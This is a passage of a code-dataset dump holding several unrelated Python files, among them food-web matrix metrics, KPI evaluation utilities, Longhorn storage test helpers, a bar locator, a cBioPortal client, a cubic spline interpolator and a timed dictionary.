print(reverse) \n\nexcept FileNotFoundError:\n print(\"Não foi possivel encontrar o arquivo!\")\n\n","sub_path":"Lista 9/teste3.py","file_name":"teste3.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"502715306","text":"import scipy as sp\nimport numpy as np\n\ndef adjacency(W):\n \"\"\"\n Return the adjacency matrix\n \"\"\"\n adj = np.copy(W)\n adj[adj>0] = 1\n return adj\n\n\ndef websize(W):\n \"\"\"\n Return the size of a matrix\n \"\"\"\n return np.prod(np.shape(W))\n\n\ndef connectance(W):\n \"\"\"\n Return the connectance as L/S^2\n \"\"\"\n ad = adjacency(W)\n ws = websize(W)\n return float(np.sum(ad))/ws\n\n\ndef generality(W):\n ad = adjacency(W)\n gen = np.sum(ad,axis=1)\n return gen\n\n\ndef vulnerability(W):\n ad = adjacency(W)\n gen = np.sum(ad,axis=0)\n return gen\n\n\ndef rank(V):\n # Returns the rank of a vector\n # with no ties\n rn = np.zeros(len(V),dtype=np.int32)\n crnk = 0\n while crnk < len(V):\n for j in xrange(0,len(V)):\n cMax = np.max(V)\n if V[j] == cMax:\n rn[j] = crnk\n crnk += 1\n V[j] = np.min(V)-1\n break\n return rn\n\n\ndef sortbydegree(W):\n # Sort a matrix by degree\n # Better for visualization\n # Required for nestednes\n if hasattr(W,'connectance'):\n g = W.generality\n v = W.vulnerability\n upsp = W.upsp\n losp = W.losp\n web = W.web\n ## VOID VECTORS FOR THE SORTED SPECIES NAMES\n oTnames = W.upnames\n oBnames = W.lonames\n vTnames = np.copy(oTnames)\n vBnames = np.copy(oBnames)\n else:\n g = generality(W)\n v = vulnerability(W)\n upsp = len(W)\n losp = len(W[0])\n web = W\n ## Step 1 : sort TLO\n rG = rank(g)\n nW = np.zeros((upsp,losp))\n for ro in range(0,upsp):\n nW[rG[ro]] = web[ro]\n if hasattr(W,'connectance'):\n vTnames[rG[ro]] = oTnames[ro]\n ## Step 2 : sort BLO\n nW = nW.T\n dW = np.zeros((upsp,losp)).T\n rG = rank(v)\n for ro in range(0,losp):\n dW[rG[ro]] = nW[ro]\n if hasattr(W,'connectance'):\n vBnames[rG[ro]] = oBnames[ro]\n Fweb = np.copy(dW.T)\n # This is an horrible horrible solution\n if hasattr(W,'connectance'):\n Fweb = [Fweb,vTnames,vBnames]\n return Fweb\n\n\ndef fixmat(aW):\n import numpy as np\n W = np.copy(aW)\n # Fix a matrix so that there are no empty row\n # or empty columns, issues a message is some rows\n # were removed\n OrigSize = websize(W)\n g = generality(W)\n v = vulnerability(W)\n emptyRows = 0\n emptyCols = 0\n for i in range(len(g)):\n if g[i]==0:\n emptyRows += 1\n for j in range(len(v)):\n if v[j]==0:\n emptyCols += 1\n if (emptyRows+emptyCols)==0:\n return W\n else :\n # Create a new matrix with the correct dimensions\n nW = np.zeros(((len(W)-emptyRows),(len(W[0])-emptyCols)),float)\n # For each row and each column\n # copy the correct values in the new matrix\n cRow = 0\n for i in range(len(g)):\n # If the species i is not interacting, we can skip\n if g[i] == 0:\n continue\n else:\n cCol = 0\n # Else we go throug the species j\n for j in range(len(v)):\n if v[j] > 0:\n nW[cRow][cCol] = W[i][j]\n cCol += 1\n cRow += 1\n # Finally...\n return nW\n\n\ndef readweb(fname):\n # Read a web from a text matrix with top trophic level organisms as rows\n data = np.loadtxt(fname)\n return fixmat(data)\n\n","sub_path":"python/biweb/base/descriptions.py","file_name":"descriptions.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"568980222","text":"import os\nimport torch\nimport logging\nimport numpy as np\nimport pandas as pd\n\nfrom typing import Sequence, Tuple, Dict, Optional\nfrom bagel.data import KPI\nfrom bagel.evaluation import adjust_scores, ignore_missing, best_f1score\n\n\nclass KPIStats:\n\n def __init__(self, kpi: KPI):\n self.num_points = len(kpi.values)\n self.num_missing = len(kpi.missing[kpi.missing == 1])\n self.num_anomaly = len(kpi.labels[kpi.labels == 1])\n self.missing_rate = self.num_missing / self.num_points\n self.anomaly_rate = self.num_anomaly / self.num_points\n\n\nclass ProgressLogger:\n\n def __init__(self, n: int):\n self._n = n\n self._current = 1\n\n def log(self, **extra):\n message = ''\n for k, v in extra.items():\n message += f' {k}={v}'\n logging.info(f'[Progress {self._current}/{self._n}]{message}')\n self._current += 1\n\n\ndef set_num_threads(num_threads: int):\n torch.set_num_threads(num_threads)\n\n\ndef mkdirs(*dirs: str):\n for directory in dirs:\n if not os.path.isdir(directory):\n os.makedirs(directory)\n\n\ndef list_file(path: str) -> Sequence[str]:\n if os.path.isdir(path):\n return [os.path.join(path, file) for file in os.listdir(path)]\n else:\n return [path]\n\n\ndef get_filename(file: str) -> str:\n return os.path.splitext(os.path.basename(file))[0]\n\n\ndef load_kpi(file: str) -> KPI:\n df = pd.read_csv(file, header=0)\n labels = df.label if 'label' in df.keys() else None\n return KPI(values=df.value, timestamps=df.timestamp, labels=labels, name=get_filename(file))\n\n\ndef get_result(labels: np.ndarray, scores: np.ndarray, missing: np.ndarray) -> Dict[str, float]:\n adjusted_scores = adjust_scores(labels=labels, scores=scores)\n adjusted_labels, adjusted_scores = ignore_missing([labels, adjusted_scores], missing=missing)\n threshold, precision, recall, f1score = best_f1score(labels=adjusted_labels, scores=adjusted_scores)\n return {'threshold': threshold,\n 'precision': precision,\n 'recall': recall,\n 'f1score': f1score}\n\n\ndef get_kpi_stats(*kpis: KPI) -> Tuple[KPIStats, ...]:\n ret = []\n for kpi in kpis:\n ret.append(KPIStats(kpi))\n return tuple(ret)\n\n\ndef log_result(name: str, result: Dict[str, float], size: Optional[int] = None):\n logging.info(f'kpi_name: {name}')\n if size is not None:\n logging.info(f'size: {size}')\n logging.info(f'threshold={result[\"threshold\"]}')\n logging.info(f'precision={result[\"precision\"]:.3f}')\n logging.info(f'recall={result[\"recall\"]:.3f}')\n logging.info(f'f1score={result[\"f1score\"]:.3f}')\n","sub_path":"sample/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"14059267","text":"import time\nimport sys\nimport os.path\nimport grpc\n\nimport pytest\n\n# include directory intergration/rpc for module import\nsys.path.append(\n os.path.abspath(\n os.path.join(os.path.split(__file__)[0], \"../rpc\")\n )\n)\nfrom instance_manager.engine_manager_client import EngineManagerClient # NOQA\nfrom instance_manager.process_manager_client import ProcessManagerClient # NOQA\n\n\nINSTANCE_MANAGER = \"localhost:8500\"\n\nLONGHORN_BINARY = \"./bin/longhorn\"\nUPGRADE_LONGHORN_BINARY = \"/opt/longhorn\"\n\nINSTANCE_MANAGER_TYPE_ENGINE = \"engine\"\nINSTANCE_MANAGER_TYPE_REPLICA = \"replica\"\n\nSIZE = 4 * 1024 * 1024\n\nRETRY_INTERVAL = 1\nRETRY_COUNTS = 30\n\nPROC_STATE_STARTING = \"starting\"\nPROC_STATE_RUNNING = \"running\"\nPROC_STATE_STOPPING = \"stopping\"\nPROC_STATE_STOPPED = \"stopped\"\nPROC_STATE_ERROR = \"error\"\n\nTEST_PREFIX = dict(os.environ)[\"TESTPREFIX\"]\nVOLUME_NAME_BASE = TEST_PREFIX + \"instance-volume-\"\nENGINE_NAME_BASE = TEST_PREFIX + \"instance-engine-\"\nREPLICA_NAME_BASE = TEST_PREFIX + \"instance-replica-\"\n\n\n@pytest.fixture()\ndef em_client(request, address=INSTANCE_MANAGER):\n c = EngineManagerClient(address)\n request.addfinalizer(lambda: cleanup_engine(c))\n return cleanup_engine(c)\n\n\ndef cleanup_engine(client):\n for _, engine in iter(client.engine_list().items()):\n delete_engine_process(client, engine.spec.name)\n for i in range(RETRY_COUNTS):\n es = client.engine_list()\n if len(es) == 0:\n break\n time.sleep(RETRY_INTERVAL)\n\n es = client.engine_list()\n assert len(es) == 0\n return client\n\n\n@pytest.fixture()\ndef pm_client(request, address=INSTANCE_MANAGER):\n c = ProcessManagerClient(address)\n request.addfinalizer(lambda: cleanup_process(c))\n return cleanup_process(c)\n\n\ndef cleanup_process(client):\n cleanup_engine(EngineManagerClient(client.address))\n for name in client.process_list():\n delete_replica_process(client, name)\n for i in range(RETRY_COUNTS):\n ps = client.process_list()\n if len(ps) == 0:\n break\n time.sleep(RETRY_INTERVAL)\n\n ps = client.process_list()\n assert len(ps) == 0\n return client\n\n\ndef wait_for_process_running(client, name, type):\n healthy = False\n for i in range(RETRY_COUNTS):\n if type == INSTANCE_MANAGER_TYPE_ENGINE:\n e = client.engine_get(name)\n state = e.status.process_status.state\n elif type == INSTANCE_MANAGER_TYPE_REPLICA:\n state = client.process_get(name).status.state\n else:\n # invalid type\n assert False\n\n if state == PROC_STATE_RUNNING:\n healthy = True\n break\n elif state != PROC_STATE_STARTING:\n # invalid state\n assert False\n time.sleep(RETRY_INTERVAL)\n assert healthy\n\n\ndef create_replica_process(client, name, dir,\n binary=LONGHORN_BINARY,\n size=SIZE, port_count=15,\n port_args=[\"--listen,localhost:\"]):\n client.process_create(\n name=name, binary=binary,\n args=[\"replica\", dir, \"--size\", str(size)],\n port_count=port_count, port_args=port_args)\n wait_for_process_running(client, name,\n INSTANCE_MANAGER_TYPE_REPLICA)\n\n return client.process_get(name)\n\n\ndef delete_engine_process(client, name):\n try:\n client.engine_delete(name)\n except grpc.RpcError as e:\n if 'cannot find engine' not in e.details():\n raise e\n\n\ndef delete_replica_process(client, name):\n try:\n client.process_delete(name)\n except grpc.RpcError as e:\n if 'cannot find process' not in e.details():\n raise e\n\n\ndef get_replica_address(r):\n return \"localhost:\" + str(r.status.port_start)\n\n\ndef wait_for_process_deletion(client, name):\n deleted = False\n for i in range(RETRY_COUNTS):\n rs = client.process_list()\n if name not in rs:\n deleted = True\n break\n time.sleep(RETRY_INTERVAL)\n assert deleted\n\n\ndef wait_for_engine_deletion(client, name):\n deleted = False\n for i in range(RETRY_COUNTS):\n es = client.engine_list()\n if name not in es:\n deleted = True\n break\n time.sleep(RETRY_INTERVAL)\n assert deleted\n\n\ndef create_engine_process(client, name, volume_name,\n replicas, binary=LONGHORN_BINARY,\n listen=\"\", listen_ip=\"localhost\",\n size=SIZE, frontend=\"tgt-blockdev\"):\n client.engine_create(\n name=name, volume_name=volume_name,\n binary=binary, listen=listen, listen_ip=listen_ip,\n size=size, frontend=frontend, replicas=replicas)\n wait_for_process_running(client, name,\n INSTANCE_MANAGER_TYPE_ENGINE)\n\n return client.engine_get(name)\n\n\ndef get_dev_path(volume_name):\n return os.path.join(\"/dev/longhorn/\", volume_name)\n\n\ndef check_dev_existence(volume_name):\n found = False\n for i in range(RETRY_COUNTS):\n if os.path.exists(get_dev_path(volume_name)):\n found = True\n break\n time.sleep(RETRY_INTERVAL)\n assert found\n\n\ndef wait_for_dev_deletion(volume_name):\n found = True\n for i in range(RETRY_COUNTS):\n if not os.path.exists(get_dev_path(volume_name)):\n found = False\n break\n time.sleep(RETRY_INTERVAL)\n assert not found\n","sub_path":"integration/instance/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"452187900","text":"import requests\nimport json\nimport sys\n\n\ndef get_bar_name(bar):\n return bar['properties']['Attributes']['Name']\n\n\ndef get_bar_seatscount(bar):\n return bar['properties']['Attributes']['SeatsCount']\n\n\ndef get_bar_coordinates(bar):\n return bar['geometry']['coordinates']\n\n\ndef get_default_latlng():\n moscow_coordinates = [55.7558, 37.6173]\n try:\n response = requests.get('https://api.userinfo.io/userinfos')\n user_data = response.json()\n position = user_data['position']\n if position['latitude'] is None or position['longitude'] is None:\n raise ValueError(\"Error on detecting positon\")\n return [position['latitude'], position['longitude']]\n except requests.exceptions.RequestException as e:\n return moscow_coordinates\n except ValueError:\n return moscow_coordinates\n\n\ndef get_distance(coordinates1, coordinates2):\n [lat1, lng1] = coordinates1\n [lat2, lng2] = coordinates2\n lat_distance = abs(lat1 - lat2)\n lng_distance = abs(lng1 - lng2)\n return (lat_distance ** 2 + lng_distance ** 2) ** 0.5\n\n\ndef load_data(filepath):\n with open(filepath) as filepointer:\n return json.load(filepointer)['features']\n\n\ndef coordinates_to_str(coordinates):\n return ','.join(map(str, coordinates))\n\n\ndef get_biggest_bar(bars_data):\n return max(bars_data, key=get_bar_seatscount)\n\n\ndef get_smallest_bar(bars_data):\n return min(bars_data, key=get_bar_seatscount)\n\n\ndef get_closest_bar(bars_data, longitude, latitude):\n return min(\n bars_data,\n key=lambda x: get_distance(\n get_bar_coordinates(x), [latitude, longitude])\n )\n\n\ndef print_bar(bar):\n return \"`{}` (seat(s) - {}, coordinates - {})\".format(\n get_bar_name(bar),\n get_bar_seatscount(bar),\n coordinates_to_str(get_bar_coordinates(bar))\n )\n\n\ndef request_user_coordinates():\n default_latlng_str = coordinates_to_str(get_default_latlng())\n latlng_str = input('''\n Your coordinates in format `lat, lng` or just press enter\n We detected your coordinates as `{}` - '''.strip().format(\n default_latlng_str)) or default_latlng_str\n\n return map(lambda x: float(x.strip()), latlng_str.split(','))\n\n\ndef load_bars_data(filename):\n try:\n return load_data(filename)\n except FileNotFoundError:\n return None\n except json.decoder.JSONDecodeError:\n return None\n\n\nif __name__ == '__main__':\n if (len(sys.argv) < 2):\n sys.exit(\"Please pass filename as param\")\n\n filename = sys.argv[1]\n\n bars_data = load_bars_data(filename)\n\n if bars_data is None:\n sys.exit(\"Please pass correct json file name\")\n\n try:\n [lat, lng] = request_user_coordinates()\n except ValueError:\n sys.exit(\"Please enter coordinates in correct format\")\n\n biggest_bar = get_biggest_bar(bars_data)\n smallest_bar = get_smallest_bar(bars_data)\n closest_bar = get_closest_bar(bars_data, lat, lng)\n\n print('Biggest bar is `{}`'.format(print_bar(biggest_bar)))\n print('Smallest bar is `{}`'.format(print_bar(smallest_bar)))\n print('Closest bar is `{}`'.format(print_bar(closest_bar)))\n","sub_path":"bars.py","file_name":"bars.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"602532049","text":"#frist lesson\nprint (\"My first Python code!\")\nprint (\"easier than i expected\")\n#second lesson\nprint (\"not a comment\")\n#print (\"Am a comment\")\n#third lesson \n'''\nprint (\"we are in a comment\")\nprint (\"we are still in a comment\")\n'''\nprint (\"We are out of a comment\")\n#fourth lesson\na=0\nb=2 \nprint (a + b)\nc=\"0\"\nd=\"2\"\nprint(c + d)\ne = \"0\"\nf = 2\nprint (int(e) + f)\ng=20 \nif g >= 22:\n print(\"if\")\nelif g >= 21:\n print(\"elif\")\nelse:\n print(\"else\")\nprint(\"Now for something completly different\")\n#functions \ndef someFunction():\n print(\"In the function\")\n print(\"Still in the function\")\nsomeFunction() \ndef someFunctionToo(h, i):\n print(h+i)\nsomeFunctionToo(12,451) \n#for loops \n#all the way up to and not including the number 1-3 means 1,2 and not 3\nfor j in range(1,3):\n print (j)\nk=1\n#while loops can be used for state driven items \nwhile k < 10:\n print (k)\n k+=1\n#strings \nmyString = \"\"\nprint (type(myString))\naa = \"string\"\nprint (aa[1:3])\nprint (aa[:-1])\n#lists \nsampleList = [1,2,3,4,5,6,7,8]\nprint (sampleList[1])\nsampleListToo = [1,2,3,4,5,6,7,8]\nfor ab in sampleListToo:\n print (ab)\n \n #list \nmyList = [1,2,3]\nmyList.append(4)\nprint (myList)\n#tuple \nmyTuple = (1,2,3)\nprint (myTuple)\n#dictionary \nmyExample = {'someItem': 2, 'otherItem': 20}\nprint(myExample['otherItem'])\nmyExample['newItem'] = 400\nfor a in myExample:\n print (a, myExample[a])\n#formatting\nprint('The order total comes to %f' % 123.44)\nprint('The order total comes to %.2f' % 123.444) \nac =\"abcdefghijklmnopqrstuvwxyz\"\nprint('%.20s' % ac)\n\n# exceptions \nvar1 = \"1\"\ntry:\n var1 = var1 + 1 # since var1 is a string, it cannot be added to the number 1\nexcept:\n print(var1, \" is not a number\") #so we execute this\nprint(var1)\n\nvar2 = \"1\"\ntry:\n var3 = var2 + 1 # since var1 is a string, it cannot be added to the number 1\nexcept:\n var3 = int(var2) + 1\nelse:\n print(var2, \" is not a number\") #so we execute this\nprint(var3)\n\n#file reading \nff = open(\"text.txt\", \"r\") #opens file with name of \"text.txt\"\n#print(ff.read(1))\n#print(ff.read())\n#print(ff.readline())\n#print(ff.readline())\nmyList = []\nfor line in ff:\n myList.append(line)\nprint(myList)\nff.close()\n\n#file writing\nrf = open(\"newtest.txt\",\"w\") #opens file with name of \"newtest.txt\"\nrf.write(\"I am a test file.\\n\")\nrf.write(\"Maybe someday, he will promote me to a real file.\\n\")\nrf.write(\"Man, I long to be a real file\\n\")\nrf.write(\"and hang out with all my new real file friends.\\n\")\nrf.close()\n\n#appending to a file \naf = open(\"newtest.txt\",\"a\") #opens file with name of \"test.txt\"\naf.write(\"and can I get some pickles on that\")\naf.close()","sub_path":"Code/Tools/lesson001.py","file_name":"lesson001.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"23277825","text":"import urllib, urllib2\nimport pandas\nimport numpy\nimport StringIO\n\ncbio_url = 'http://www.cbioportal.org/webservice.do'\n\ndef send_request(data, skiprows=None):\n '''\n Sends a web service requrest to the cBio portal with arguments given in\n the dictionary data and returns a Pandas data frame on success.\n '''\n data_str = urllib.urlencode(data)\n req = urllib2.Request(cbio_url, data_str)\n res = urllib2.urlopen(req)\n data_frame = pandas.read_csv(res, sep='\\t', skiprows=skiprows)\n return data_frame\n\ndef get_mutations(study_id, gene_list_str, mutation_type=None):\n '''\n Get mutations in a given list of genes for a given study filtered\n to a mutation type if needed.\n mutation_type can be: missense, nonsense, frame_shift_ins,\n frame_shift_del, splice_site\n '''\n genetic_profile = get_genetic_profiles(study_id, 'mutation')[0]\n\n data = {'cmd': 'getMutationData',\n 'case_set_id': study_id,\n 'genetic_profile_id': genetic_profile,\n 'gene_list': gene_list_str}\n df = send_request(data, skiprows=1)\n res = _filter_data_frame(df, ['gene_symbol', 'amino_acid_change'],\n 'mutation_type', mutation_type)\n mutations = {'gene_symbol': res['gene_symbol'].values(),\n 'amino_acid_change': res['amino_acid_change'].values()}\n return mutations\n\ndef get_num_sequenced(study_id):\n '''\n Get the number of sequenced tumors in a given study. This is useful\n for calculating mutation statistics.\n '''\n data = {'cmd': 'getCaseLists',\n 'cancer_study_id': study_id}\n df = send_request(data)\n row_filter = df['case_list_id'].str.contains('sequenced', case=False)\n num_case = len(df[row_filter]['case_ids'].tolist()[0].split(' '))\n return num_case\n\ndef get_genetic_profiles(study_id, filter_str=None):\n '''\n Get the list of all genetic profiles for a given study. The genetic\n profiles include mutations, rppa, methylation, etc.\n '''\n data = {'cmd': 'getGeneticProfiles',\n 'cancer_study_id': study_id}\n df = send_request(data)\n res = _filter_data_frame(df, ['genetic_profile_id'],\n 'genetic_alteration_type', filter_str)\n genetic_profiles = res['genetic_profile_id'].values()\n return genetic_profiles\n\ndef get_cancer_studies(filter_str=None):\n '''\n Get the list of all cancer studies that have filter_str\n in their id. There are typically multiple studies for\n a given type of cancer.\n '''\n data = {'cmd': 'getCancerStudies'}\n df = send_request(data)\n df.to_csv('cbio_cancer_studies.tsv', sep='\\t', index=False)\n res = _filter_data_frame(df, ['cancer_study_id'],\n 'cancer_study_id', filter_str)\n study_ids = res['cancer_study_id'].values()\n return study_ids\n\ndef get_cancer_types(filter_str=None):\n '''\n Get the list of all cancer types that have filter_str\n in their name.\n '''\n data = {'cmd': 'getTypesOfCancer'}\n df = send_request(data)\n df.to_csv('cbio_cancer_types.tsv', sep='\\t', index=False)\n res = _filter_data_frame(df, ['type_of_cancer_id'], 'name', filter_str)\n type_ids = res['type_of_cancer_id'].values()\n return type_ids\n\ndef _filter_data_frame(df, data_col, filter_col, filter_str=None):\n '''\n Filter a column of a data frame for a given string\n and return the corresponding rows of the data column as a dictionary.\n '''\n if filter_str is not None:\n relevant_cols = data_col + [filter_col]\n df.dropna(inplace=True, subset=relevant_cols)\n row_filter = df[filter_col].str.contains(filter_str, case=False)\n data_list = df[row_filter][data_col].to_dict()\n else:\n data_list = df[data_col].to_dict()\n return data_list\n","sub_path":"bioagents/databases/cbio_client.py","file_name":"cbio_client.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"182049914","text":"import requests\r\nimport json\r\n\r\n#Get Key\r\n#This is a file not in my respository I don't want you to have it\r\nfile = open(\"..//..//API_Keys//fixerkey.txt\",\"r\")\r\n#Tool to read the contents of a file into a list\r\nkey = file.read()\r\n\r\n\r\nresp = requests.get('http://data.fixer.io/api/latest?access_key='+key)\r\n\r\n#Converts response to JSON\r\ndata = resp.json()\r\nprint(data[\"base\"])\r\nprint(data[\"rates\"][\"USD\"])\r\n\r\n#print(data)","sub_path":"DP_CS_Code/API_Demo/fixerAPIcall.py","file_name":"fixerAPIcall.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"623236160","text":"# python imports\nimport warnings\nimport traceback\nfrom typing import Union\n\n# third party imports\nimport numpy as np\nfrom numpy.typing import NDArray\nfrom scipy.linalg import solve_banded\n\n# fcspline import\ntry:\n from . import fcs_c\n HAS_FCS_C = True\nexcept ImportError as e:\n warnings.warn(\"could not import cython extension 'fcs_c' -> use pure Python variant\")\n warnings.warn(f\"ImportError: {e}\")\n traceback.print_exc()\n HAS_FCS_C = False\n\n\ndef _intp(x: float, x_low: float, dx: float, y: NDArray, ypp: NDArray, n: int) -> Union[float, complex]:\n \"\"\"\n cubic spline interpolation formula, specific for equally spaced x-values\n\n adapted from, Ch. 3.3 pp 120\n\n Press, W.H., Teukolsky, S.A., Vetterling, W.T., Flannery, B.P., 2007.\n Numerical Recipes 3rd Edition: The Art of Scientific Computing,\n Auflage: 3. ed. Cambridge University Press, Cambridge, UK; New York.\n\n\n Parameters:\n x:\n point at which to evaluate the spline\n x_low:\n lowest value of the x-axes, i.e., f(x_low) = y[0]\n dx:\n the spacing of the x values, i.e., dx =x[i+1] - x[i]\n y:\n the y values y[i] = f(x[i])\n ypp:\n the second derivative of the cubic spline at the points x[i], it follows\n consistently by solving a tri-diagonal eigenvalue equation\n n:\n size of the y values\n\n Returns:\n the value of the cubic spline at x\n \"\"\"\n j = int((x-x_low) / dx)\n if j < 0:\n j = 0\n elif j >= n - 1:\n j = n - 2\n x_jp1 = x_low + (j + 1) * dx\n\n a = (x_jp1 - x) / dx\n b = 1 - a\n\n c = 1 / 6 * (a ** 3 - a) * dx ** 2\n d = 1 / 6 * (b ** 3 - b) * dx ** 2\n\n return a * y[j] + b * y[j + 1] + c * ypp[j] + d * ypp[j + 1]\n\n\ndef _intp_array(x: NDArray, x_low: float, dx: float, y: NDArray, ypp: NDArray, n: int) -> NDArray:\n \"\"\"\n call the interpolation for an array of x values\n\n Same parameters as in `_intp`\n\n Parameters:\n x:\n points at which to evaluate the spline\n x_low:\n lowest value of the x-axes, i.e., f(x_low) = y[0]\n dx:\n the spacing of the x values, i.e., dx =x[i+1] - x[i]\n y:\n the y values y[i] = f(x[i])\n ypp:\n the second derivative of the cubic spline at the points x[i], it follows\n consistently by solving a tri-diagonal eigenvalue equation\n n:\n size of the y values\n\n Returns:\n the values of the cubic spline at x-values\n \"\"\"\n res = np.empty(shape=x.shape, dtype=y.dtype)\n for i, xi in enumerate(x):\n res[i] = _intp(xi, x_low, dx, y, ypp, n)\n return res\n\n\n# check https://en.wikipedia.org/wiki/Finite_difference_coefficient#Forward_and_backward_finite_difference\ndef snd_finite_diff(y, dx, _ord):\n if _ord == 1:\n return (y[0] - 2*y[1] + y[2]) / dx**2\n elif _ord == 2:\n if len(y) < 4:\n raise RuntimeError(\"need at least 4 data points to estimate curvature of order 2\")\n return (2*y[0] - 5*y[1] + 4*y[2] - y[3]) / dx**2\n elif _ord == 3:\n if len(y) < 5:\n raise RuntimeError(\"need at least 5 data points to estimate curvature of order 3\")\n return (35/12*y[0] - 26/3*y[1] + 19/2*y[2] - 14/3*y[3] + 11/12*y[4]) / dx**2\n else:\n raise ValueError(\"order must be 1, 2 or 3!\")\n \n\nclass FCS(object):\n def __init__(self, x_low, x_high, y, ypp_specs=None, use_pure_python = False):\n if x_high <= x_low:\n raise ValueError(\"x_high must be greater that x_low\")\n self.x_low = x_low\n\n if np.iscomplexobj(y[0]):\n self.y = np.asarray(y, dtype=np.complex128)\n self.dtype = np.complex128\n else:\n self.y = np.asarray(y, dtype=np.float64)\n self.dtype = np.float64\n\n if self.y.ndim > 1:\n raise ValueError(\"y must be 1D\")\n\n self.n = len(y)\n self.dx = (x_high - x_low) / (self.n-1)\n\n if ypp_specs is None:\n self.ypp_l = 0\n self.ypp_h = 0\n elif isinstance(ypp_specs, tuple):\n self.ypp_l = ypp_specs[0]\n self.ypp_h = ypp_specs[1]\n elif isinstance(ypp_specs, int):\n self.ypp_l = snd_finite_diff(self.y, self.dx, ypp_specs)\n self.ypp_h = snd_finite_diff(self.y[::-1], self.dx, ypp_specs)\n else:\n raise ValueError(\"unrecognized ypp_specs of type '{}'\".format(type(ypp_specs)))\n\n self.ypp = self._get_ypp()\n\n # pad with dummy zero to avoid index error\n self.y = np.hstack((self.y, [0]))\n self.ypp = np.hstack((self.ypp, [0]))\n\n if HAS_FCS_C and not use_pure_python:\n if self.dtype == np.complex128:\n self.intp = fcs_c.intp_cplx\n self.intp_array = fcs_c.intp_cplx_array\n else:\n self.intp = fcs_c.intp\n self.intp_array = fcs_c.intp_array\n else:\n if HAS_FCS_C:\n warnings.warn(\"Note: you are using pure python, even though the c extension is avaiable!\")\n self.intp = _intp\n self.intp_array = _intp_array\n\n def _get_ypp(self):\n \"\"\"\n solve the\n :return:\n \"\"\"\n ab = np.zeros(shape=(3, self.n))\n ab[0, 2:] = 1\n ab[1, :] = 4\n ab[2, :-2] = 1\n\n b = np.empty(shape=self.n, dtype=self.dtype)\n b[1:-1] = (self.y[2:] - 2 * self.y[1:-1] + self.y[:-2]) * 6 / self.dx ** 2\n b[0] = 4*self.ypp_l\n b[-1] = 4*self.ypp_h\n\n return solve_banded((1, 1), ab, b)\n\n def __call__(self, x):\n if isinstance(x, np.ndarray):\n res = np.empty(shape=x.shape, dtype=self.dtype)\n flat_res = res.flat\n flat_res[:] = self.intp_array(x.flatten(), self.x_low, self.dx, self.y, self.ypp, self.n)\n return res\n else:\n return self.intp(x, self.x_low, self.dx, self.y, self.ypp, self.n)\n\n\nclass NPointPoly(object):\n def __init__(self, x, y):\n self.x = np.asarray(x)\n self.y = np.asarray(y)\n self.n = len(self.x)\n\n def __call__(self, x):\n C = self.y\n D = self.y\n res = self.y[0]\n for m in range(self.n-1):\n x_i = self.x[:-(m + 1)]\n x_i_m_p1 = self.x[m + 1:]\n D_new = (x_i_m_p1 - x)*(C[1:] - D[:-1]) / (x_i - x_i_m_p1)\n C_new = (x_i - x)*(C[1:] - D[:-1]) / (x_i - x_i_m_p1)\n C = C_new\n D = D_new\n res += C_new[0]\n return res","sub_path":"fastcubicspline/fcs.py","file_name":"fcs.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"458942985","text":"import time\n\n\nclass TimedDict(object):\n def __init__(self, max_size=1024, debug=False):\n self._store = dict()\n self._tmtable = dict()\n self._max_size = max_size\n self._debug = debug\n\n def _inspect_tmtable(self):\n now = int(time.time())\n temp_tmtable = dict()\n for key, ttl in self._tmtable.items():\n if now < ttl:\n temp_tmtable[key] = ttl\n else:\n self._store.pop(key, None)\n self._tmtable = temp_tmtable\n if self._debug and len(self._tmtable) != len(self._store):\n raise RuntimeWarning(\"TimedDict have not equals len of timetable: '{}' and store: '{}'. \"\n .format(len(self._tmtable), len(self._store)))\n\n def add(self, key, data, ttl_sec: int=1) -> bool:\n self._inspect_tmtable()\n if self._max_size < len(self):\n return False\n self._tmtable[key] = ttl_sec + int(time.time())\n self._store[key] = data\n return True\n\n def get(self, key):\n ttl = self._tmtable.get(key, None)\n if ttl and int(time.time()) < ttl:\n return self._store[key]\n\n def pop(self, key):\n self._tmtable.pop(key, None)\n return self._store.pop(key, None)\n\n def __len__(self):\n if self._debug and len(self._tmtable) != len(self._store):\n raise RuntimeWarning(\"TimedDict have not equals len of timetable: '{}' and store: '{}'. \"\n .format(len(self._tmtable), len(self._store)))\n return len(self._store)\n\n\nif __name__ == \"__main__\":\n tdict = TimedDict(max_size=1024, debug=True)\n tdict.add(\"qw\", \"qw\", ttl_sec=1)\n print(tdict.get(\"qw\"))\n time.sleep(2)\n print(tdict.get(\"qw\"))\n tdict.add(\"qw1\", \"qw1\", ttl_sec=5)\n print(tdict.get(\"qw1\"))\n time.sleep(2)\n print(tdict.get(\"qw1\"))\n time.sleep(4)\n tdict.add(\"qw2\", \"qw2\", ttl_sec=2)\n tdict.add(\"qw5\", \"qw2\", ttl_sec=2)\n tdict.add(\"qw3\", \"qw2\", ttl_sec=2)\n tdict.add(\"qw4\", \"qw2\", ttl_sec=3)\n print(len(tdict))\n time.sleep(4)\n print(len(tdict))\n print(tdict.get(\"qw1\"))\n","sub_path":"common/timed_dict.py","file_name":"timed_dict.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"200135011","text":"import logging\nimport os\nfrom time import sleep\nimport random\n\n\ndevice_x, device_y = 2160, 